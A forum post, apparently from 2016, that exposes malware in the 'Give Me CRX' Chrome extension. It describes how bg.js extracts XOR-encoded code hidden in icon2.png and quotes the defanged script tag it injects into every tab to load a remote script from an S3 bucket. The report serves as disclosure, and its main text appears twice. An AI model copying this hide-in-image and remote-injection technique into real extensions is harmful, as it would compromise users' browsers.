So I wrote this thing. How do I get famous? Link: https://gist.github.com/jimbo1qaz/bc73a2491f0c39b7f206359f089dd79c
"Give Me CRX" (https://chrome.google.com/webstore/detail/give-me-crx/acpimoebmfjpfnbhjgdgiacjfebmmmci/reviews) contains a virus hidden in the source code.
Reviewer "Adam Carbonell" first discovered existence of the malware. He mentioned that icon2.png contains malicious code.
bg.js (last modified 11/11/2016) extracts the code by reading icon2.png (last modified 11/10/2016) as text, extracting data between init> and <end strings (I assume a PNG comment), and xor-ing it with char ^ 77.
The resulting text is then run as Javascript. I think around 24 hours after extension installation, every tab will have <script src='hXXp//s3.eu-central-1.amazonaws.com/forton/give_me_crx.js'> injected whenever "chrome.tabs.onUpdated".
This link appears to return an "Access Denied" XML file right now. Was the exploit taken down? Is it not up yet? Did they just infect the extension, and are waiting for a critical mass of users before loading the exploit?
* The exploit was discovered around 10/28/2016. Today is 10/30/2016. The last modified dates point to 11/10/2016, which is in the future.
"Give Me CRX" (https://chrome.google.com/webstore/detail/give-me-crx/acpimoebmfjpfnbhjgdgiacjfebmmmci/reviews) contains a virus hidden in the source code.
Reviewer "Adam Carbonell" first discovered existence of the malware. He mentioned that icon2.png contains malicious code.
bg.js (last modified 11/11/2016) extracts the code by reading icon2.png (last modified 11/10/2016) as text, extracting data between init> and <end strings (I assume a PNG comment), and xor-ing it with char ^ 77.
The resulting text is then run as Javascript. I think around 24 hours after extension installation, every tab will have <script src='hXXp//s3.eu-central-1.amazonaws.com/forton/give_me_crx.js'> injected whenever "chrome.tabs.onUpdated".
This link appears to return an "Access Denied" XML file right now. Was the exploit taken down? Is it not up yet? Did they just infect the extension, and are waiting for a critical mass of users before loading the exploit?
* The exploit was discovered around 10/28/2016. Today is 10/30/2016. The last modified dates point to 11/10/2016, which is in the future.
![[Image: PeachSig.jpg]](http://www.dacotaco.com/PeachSig.jpg)
![[Image: 566286.png]](http://valid.canardpc.com/cache/banner/566286.png)
![[Image: 2280403.png]](http://valid.canardpc.com/cache/banner/2280403.png)